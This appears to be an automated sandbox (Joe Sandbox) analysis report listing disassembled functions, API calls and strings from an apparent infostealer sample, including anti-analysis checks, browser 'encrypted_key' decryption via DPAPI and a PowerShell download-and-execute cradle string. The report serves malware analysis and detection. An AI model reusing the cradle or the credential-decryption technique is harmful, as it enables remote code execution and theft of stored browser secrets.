Part of subcall function 023F1377: VirtualAllocExNuma.KERNEL32(00000000), ref: 023F1399
Part of subcall function 023F1377: ExitProcess.KERNEL32 ref: 023F13AA

Part of subcall function 023F1487: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023F14A5
Part of subcall function 023F1487: __aulldiv.LIBCMT ref: 023F14BF
Part of subcall function 023F1487: __aulldiv.LIBCMT ref: 023F14CD
Part of subcall function 023F1487: ExitProcess.KERNEL32 ref: 023F14FB

Part of subcall function 02406C77: GetUserDefaultLangID.KERNEL32 ref: 02406C7B

Part of subcall function 023F13F7: ExitProcess.KERNEL32 ref: 023F142D

Part of subcall function 02407C47: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,023F141E), ref: 02407C77
Part of subcall function 02407C47: RtlAllocateHeap.NTDLL(00000000), ref: 02407C7E
Part of subcall function 02407C47: GetUserNameA.ADVAPI32(00000104,00000104), ref: 02407C96

Part of subcall function 02407CD7: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02407D07
Part of subcall function 02407CD7: RtlAllocateHeap.NTDLL(00000000), ref: 02407D0E
Part of subcall function 02407CD7: GetComputerNameA.KERNEL32(?,00000104), ref: 02407D26

Part of subcall function 0240AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0240AF3C
Part of subcall function 0240AF27: lstrcpy.KERNEL32(00000000), ref: 0240AF7B
Part of subcall function 0240AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0240AF89

Part of subcall function 0240AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0240AE7C

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02406FD1
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02406FEF
CloseHandle.KERNEL32(00000000), ref: 02407000
Sleep.KERNEL32(00001770), ref: 0240700B
CloseHandle.KERNEL32(?,00000000,?,006D6F40,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 02407021
ExitProcess.KERNEL32 ref: 02407029

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
Instruction ID: 16d29935dcb61ba582a100cae3d6c8005609dd2e296d94684ee1f61d1c9334af
Opcode Fuzzy Hash: dff8bde81555aea59465c9e16628ddb3addc1784a124ec154de877713b950503
Instruction Fuzzy Hash: C0312C71A44214AACB04FBE1EC94EFEB77BAF54301F50453EA252A21D0EF746985CE62

Function 0040A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
LocalFree.KERNEL32(00410447), ref: 0040A1E0
CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: e124faafaf4e289e5d0c391c268fcc7043a292ff11b19f333ed3c72ccf35b9d9
Instruction ID: e28607e9d9a2a96074382c0c0d30a82733061daf82e5a8752830093732aacc78
Opcode Fuzzy Hash: e124faafaf4e289e5d0c391c268fcc7043a292ff11b19f333ed3c72ccf35b9d9
Instruction Fuzzy Hash: 9731FC74A01209EFDB14CF94D845BEE77B5AB48304F10815AE911AB3D0D778AA91CFA6

Function 023FA377 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 023FA3A3
GetFileSizeEx.KERNEL32(000000FF,?), ref: 023FA3C8
LocalAlloc.KERNEL32(00000040,?), ref: 023FA3E8
ReadFile.KERNEL32(000000FF,?,00000000,023F16F6,00000000), ref: 023FA411
LocalFree.KERNEL32(023F16F6), ref: 023FA447
CloseHandle.KERNEL32(000000FF), ref: 023FA451

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
Instruction ID: a9e6545a1048fa5fd0b40162e33fef5f1b894b2152f6e31f514d8f49d74b9345
Opcode Fuzzy Hash: 06cf558428df834f5adc8c7b4b2342f5685766828323e2485330cc1a7ca5d982
Instruction Fuzzy Hash: 7D31EAB4A00209EFDB14CFA4E889FAE77B5BF48704F108159ED15A7390D774AA81CFA1

Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CD1A

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__amsg_exit.LIBCMT ref: 0041CD3A
__lock.LIBCMT ref: 0041CD4A
InterlockedDecrement.KERNEL32(?), ref: 0041CD67
free.MSVCRT ref: 0041CD7A
InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD

Function 0240CF75 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0240CF81

Part of subcall function 0240C507: __getptd_noexit.LIBCMT ref: 0240C50A
Part of subcall function 0240C507: __amsg_exit.LIBCMT ref: 0240C517

__amsg_exit.LIBCMT ref: 0240CFA1
__lock.LIBCMT ref: 0240CFB1
InterlockedDecrement.KERNEL32(?), ref: 0240CFCE
free.MSVCRT ref: 0240CFE1
InterlockedIncrement.KERNEL32(0042C980), ref: 0240CFF9

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
Instruction ID: a4e56fe9753c9d692041cb9c57a23a5c2fc11743a4ed306a480aea0e3404e33a
Opcode Fuzzy Hash: 230712e3deecaa92b850b6e343f5c0a0bb14ee3de3d18a069ed343d21a6d6265
Instruction Fuzzy Hash: 71016175A01621DBCB21AB6AD4C4B5EB7A1FF04718F04423BE815A76C0C73869C2DFDA

Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041719F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD

Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85

VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333

Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078

Strings

@, xrefs: 00417226

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5

Function 024073E7 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 02407406
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,02407681,00000000,00420BB0,00000000,00000000), ref: 02407434

Part of subcall function 024070B7: strlen.MSVCRT ref: 024070C8
Part of subcall function 024070B7: strlen.MSVCRT ref: 024070EC

VirtualQueryEx.KERNEL32(024077F4,00000000,?,0000001C), ref: 02407479
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02407681), ref: 0240759A

Part of subcall function 024072C7: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 024072DF

Strings

@, xrefs: 0240748D

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction ID: 8d9128e93a8e2e7419967d85541121e2777d341d9ee75492ce91c0e2a65a30c8
Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction Fuzzy Hash: 1451D8B5E00109ABDB04CF99D991AEFB7B6BF88300F148569F915A7380D734EA51CBA1

Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69

Strings

zn@, xrefs: 00406A0D, 00406A19, 00406A2C, 00406A35, 00406A59, 00406A82, 00406A85, 00406B3F, 00406B51, 00406B5D, 00406B66, 00406BE3, 00406B99, 00406A9A, 00406ABD, 00406AC9, 00406AF1, 00406B21, 00406B33, 00406AFD, 00406B0A, 00406AA6
zn@, xrefs: 00406B78, 00406C06, 00406C0B, 00406BB5

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: zn@$zn@
API String ID: 1029625771-1156428846
Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95

Function 02404C37 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,006D6D0C), ref: 02404C92

Part of subcall function 024091D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02409202

lstrcat.KERNEL32(?,00000000), ref: 02404CB8
lstrcat.KERNEL32(?,?), ref: 02404CD7
lstrcat.KERNEL32(?,?), ref: 02404CEB
lstrcat.KERNEL32(?,006D6C84), ref: 02404CFE
lstrcat.KERNEL32(?,?), ref: 02404D12
lstrcat.KERNEL32(?,006D6CC8), ref: 02404D26

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

Part of subcall function 02409187: GetFileAttributesA.KERNEL32(00000000,?,023F1DFB,?,?,00425784,?,?,00420E22), ref: 02409196

Part of subcall function 02404A27: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02404A37
Part of subcall function 02404A27: RtlAllocateHeap.NTDLL(00000000), ref: 02404A3E
Part of subcall function 02404A27: wsprintfA.USER32 ref: 02404A5D
Part of subcall function 02404A27: FindFirstFileA.KERNEL32(?,?), ref: 02404A74

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
Instruction ID: 7b8b47ce20828c971a3407947ced55177a4052b39cab39374b774c6b73c7645e
Opcode Fuzzy Hash: 91df7f0c7e554cb1d3044ee6f87cd087b154477ead0d8d2d1c74f8365ca17e83
Instruction Fuzzy Hash: AF314EB6D00218A7DB24EBB0DCC4EE9733AAF58700F44469EB75596090EA749BC88F91

Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
')", xrefs: 00412F03
<, xrefs: 00412F89
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: f5c2a12c145dcaa2db7d0abea027a0bbac224cbe30c9f346d8a6323810ab9f2c
Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
Opcode Fuzzy Hash: f5c2a12c145dcaa2db7d0abea027a0bbac224cbe30c9f346d8a6323810ab9f2c
Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99

Function 00415190 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 004151CA
lstrcatA.KERNEL32(?,00421058), ref: 004151E7
lstrcatA.KERNEL32(?,00A6DF60), ref: 004151FB
lstrcatA.KERNEL32(?,0042105C), ref: 0041520D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

Strings

cA, xrefs: 00415235, 0041526A, 0041528F, 00415238, 0041526D

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID: cA
API String ID: 2667927680-2872761854
Opcode ID: b403d34ea9d62d950dcb6905ec4e444727b63703994a5400a01d4a597f8bfd92
Instruction ID: dc16e4b81abbfe3fe676fda19ddb0faac8fab1e973e0b9c2e11f24d889f851c9
Opcode Fuzzy Hash: b403d34ea9d62d950dcb6905ec4e444727b63703994a5400a01d4a597f8bfd92
Instruction Fuzzy Hash: CD21C8B6E04218A7CB14FB70EC46EED333E9B94300F40455EB656561D1EE78ABC8CB95

Function 023F1487 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 023F14A5
__aulldiv.LIBCMT ref: 023F14BF
__aulldiv.LIBCMT ref: 023F14CD
ExitProcess.KERNEL32 ref: 023F14FB

Strings

@, xrefs: 023F149A

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction ID: d68f0186ba068bd63cd9c8fb7a60d9249f5affa8157eab2e858dbbcbfd181c4e
Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction Fuzzy Hash: 1B016DB0E54308EAEF50EBD0EC89B9DBB79AF4070AF208459E709B62C0D77495848B55

Function 023FA7C7 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 155memoryCOMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,0042124C,00000003), ref: 023FA7E4

Part of subcall function 0240ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0240ACFF

memcmp.MSVCRT(?,004210FC,00000003), ref: 023FA839
memset.MSVCRT ref: 023FA872
LocalAlloc.KERNEL32(00000040,?), ref: 023FA8CB

Strings

@, xrefs: 023FA87B

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: memcmp$AllocLocallstrcpymemset
String ID: @
API String ID: 631489823-2766056989
Opcode ID: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
Instruction ID: 3d4b9b60c5cd9d64d39a3d80d8bd239f7d5e951cff4a3e4ce311a4ee91db940b
Opcode Fuzzy Hash: a0dfd0b00870158b78f1bd2e6a7999d260a6401e0527ae678fcebbd35b121d7e
Instruction Fuzzy Hash: 21514B30A10358EFDB28DFA4EC85FED77B6AF54304F008129EA096B590EB746A49CF50

Function 00410FC0 Relevance: 7.6, APIs: 5, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00410FE8
strtok_s.MSVCRT ref: 0041112D

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,00A6DD90,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 9e9d72db176d525f393edc8e7c5273babc13eaabf51b3923ecac453cd6a378d5
Instruction ID: 03db8a1056b7d3decc043d16849240f9eafe82692520a9407f7f8401fd2e2a69
Opcode Fuzzy Hash: 9e9d72db176d525f393edc8e7c5273babc13eaabf51b3923ecac453cd6a378d5
Instruction Fuzzy Hash: EF515E75A0410AEFCB08CF54D595AEEBBB5FF48308F10805EE9029B361D734EA91CB95

Function 0040A430 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489

Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2

Part of subcall function 0040A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
Part of subcall function 0040A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
Part of subcall function 0040A2B0: memcpy.MSVCRT(?,?,?), ref: 0040A316
Part of subcall function 0040A2B0: LocalFree.KERNEL32(?), ref: 0040A323

Strings

, xrefs: 0040A511
"encrypted_key":", xrefs: 0040A480
DPAPI, xrefs: 0040A4D9

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 3731072634-738592651
Opcode ID: 5b78046f85af627c09a299ab182c71b3d4e9139a28e8ef8ebe0ef0d4724f4f60
